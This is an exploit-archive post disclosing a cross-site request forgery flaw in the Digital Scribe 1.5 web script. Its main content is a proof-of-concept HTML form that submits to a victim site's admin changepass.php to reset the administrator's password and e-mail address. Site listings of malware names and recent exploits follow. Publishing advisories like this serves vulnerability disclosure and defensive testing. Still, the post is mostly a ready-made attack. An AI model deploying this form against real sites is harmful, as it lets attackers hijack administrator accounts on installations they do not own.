Digital Scribe 1.5 Cross Site Request Forgery

Posted on 12 December 2011

Digital Scribe v1.5 CSRF Vulnerability

Author : Muhammet Cagri Tepebasili

Date : 11.11.2011

Script Homepage and Download : http://www.digital-scribe.org/

Version : 1.5

Tested on : Linux Mint 11

Exploit :

<fromtr>
<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/
changepass.php>
<BR>New Password: <INPUT TYPE=TEXT NAME=pass>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=submit VALUE="Update">
</form></td></tr></table>

<P>
<table border=1><tr><td>
<FORM METHOD=POST ACTION=[victim]/admin/changepass.php>
<BR>New E-mail: <INPUT TYPE=TEXT NAME=emailad VALUE=<?php echo "$emailad";
?>>
<INPUT TYPE=HIDDEN NAME=ID VALUE=<?php echo "$_SESSION[secure_id]"; ?>>
<BR><INPUT TYPE=submit NAME=chng_email VALUE="Update">
</form></td></tr></table>
</fromtr>

Greetz : Eymen Sen and Cafer K.Sezer

TOP

Malware :

RATDispenser
whispergate
Borat RAT
Trojanized X_Trader
BlackLotus

Last 20

Exploits :

Customer Support System 1.0 Cross Site Scripting
Xhibiter NFT Marketplace 1.10.2 SQL Injection
WordPress WPCode Lite 2.1.14 Cross Site Scripting
Azon Dominator Affiliate Marketing Script SQL Injection
Simple Laboratory Management System 1.0 SQL Injection

Last 20